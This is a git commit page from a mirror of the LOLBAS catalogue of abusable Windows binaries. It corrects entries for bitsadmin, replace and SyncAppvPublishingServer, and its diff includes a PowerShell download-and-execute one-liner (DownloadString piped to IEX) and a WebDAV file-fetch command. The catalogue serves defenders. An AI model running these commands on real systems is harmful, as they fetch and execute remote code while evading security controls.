infosecn1nja
/
LOLBAS
mirror of https://github.com/infosecn1nja/LOLBAS.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Minor modifications: 

* Can only get bitsadmin to work with regular user. Testing from a
  webshell doesn't work
* Replace syntax seems to only function for webdav, as the referenced
  source implies
* Syncapp powershell syntax errors: extra (, no terminating "
master
Jenic Rycr 2018-05-16 10:07:17 -06:00
parent f54950851a
commit f418a4f599
No known key found for this signature in database
GPG Key ID: 98F9E0B7A7B80AEE
3 changed files with 5 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
OSBinaries/Bitsadmin.md
View File

@ -40,6 +40,7 @@ c:\windows\sysWOW64\bitsadmin.exe
```
Notes:
* Requires active user (doesn't work from a web shell)
Detection:

4
OSBinaries/Replace.md
View File

@ -3,9 +3,9 @@
* Functions: Copy, Download
```
replace c:\source\file.cab c:\destination /A
replace c:\source\file.cab c:\destination /A
replace \\http://webdav.host.com \foo\bar.exe c:\outdir /A
replace \\webdav.host.com\foo\bar.exe c:\outdir /A
```

4
OSBinaries/Syncappvpublishingserver.md
View File

@ -3,7 +3,7 @@
* Functions: Execute
```
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
```
Acknowledgements:
@ -23,6 +23,6 @@ C:\Windows\System32\SyncAppvPublishingServer.exe
Notes:
Command injection into PowerShell
Might have been fixed in newest version of Windows 10.
(Works as of 10.0.16299.371)